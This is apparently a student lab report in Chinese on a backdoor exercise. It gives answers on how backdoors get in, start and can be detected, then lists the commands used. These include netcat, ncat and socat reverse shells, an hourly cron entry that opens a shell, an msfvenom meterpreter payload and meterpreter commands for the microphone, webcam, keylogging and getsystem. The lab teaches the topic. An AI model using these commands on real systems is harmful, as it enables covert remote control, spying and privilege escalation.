1、使用netcat获取主机操作Shell,cron启动 (0.5分)
2、使用socat获取主机操作Shell, 任务计划启动 (0.5分)
3、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
4、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
5、可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。
1、例举你能想到的一个后门进入到你系统中的可能方式?
答:正版软件故意或被攻击,包含后门;正版库文件中包含后门;安装包中包含后门,放到网上供下载;绑定到特定文件中,放到网上供下载;直接发送恶意程序;发送攻击性钓鱼链接,恶意网站种马;攻击系统漏洞,获取控制权后,安装后门。
2、例举你知道的后门如何启动起来(win及linux)的方式?
答:开机自启动技术;win的定时任务;linux的cron(linux下的定时执行工具);修改文件关联;修改后门程序名字、图标、扩展名,诱导用户点击。
3、Meterpreter有哪些给你映像深刻的功能?
答:可直接生成后门程序,生成后门程序,可以获取目标主机音频、摄像头、截图、击键操作(谍战片的既视感)。
4、如何发现自己有系统有没有被安装后门?
答:及时安装系统补丁,开启杀毒软件,杀毒软件的木马库版本及时更新,手动查看注册表和启动项,关注任务计划程序库。
是一个底层工具,进行基本的TCP、UDP数据收发。常被与其他工具结合使用,起到后门的作用。
natcat.exe -help
可以查看帮助文档
-4 Use IPv4 only
-6 Use IPv6 only
-C, --crlf Use CRLF for EOL sequence
-c, --sh-exec <command> Executes the given command via /bin/sh
-e, --exec <command> Executes the given command
--lua-exec <filename> Executes the given Lua script
-g hop1[,hop2,...] Loose source routing hop points (8 max)
-G <n> Loose source routing hop pointer (4, 8, 12, ...)
-m, --max-conns <n> Maximum <n> simultaneous connections
-h, --help Display this help screen
-d, --delay <time> Wait between read/writes
-o, --output <filename> Dump session data to a file
-x, --hex-dump <filename> Dump session data as hex to a file
-i, --idle-timeout <time> Idle read/write timeout
-p, --source-port port Specify source port to use
-s, --source addr Specify source address to use (doesn‘t affect -l)
-l, --listen Bind and listen for incoming connections
-k, --keep-open Accept multiple connections in listen mode
-n, --nodns Do not resolve hostnames via DNS
-t, --telnet Answer Telnet negotiations
-u, --udp Use UDP instead of default TCP
--sctp Use SCTP instead of default TCP
1.Windows 打开监听
ncat.exe -l -p 端
nc 192.168.248.1 1209 -e /bin/sh


(2)Linux获取Windows Shell
nc -l -p 1209
ncat.exe 192.168.248.128 1209 -e cmd.exe
ncat.exe -l -p 1209
15 * * * * /bin/netcat 192.168.248.1 1209 -e /bin/sh
socat - tcp:192.168.248.1:1209
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.248.128 LPORT=1209 -f exe > meter_backdoor.exe
ncat.exe -lv 1209 > meter_backdoor.exe
查看连接状态nc 192.168.248.1 1209 < meter_backdoor.exe
在Kali上使用msfconsole
指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端
获取目标主机shell 主机音频 主机摄像头 键盘输入 提权
shell record_mic webcam_snap keyscan_start keyscan_dump getsystem
下载反弹连接的shellcode
原文:https://www.cnblogs.com/st66/p/14588068.html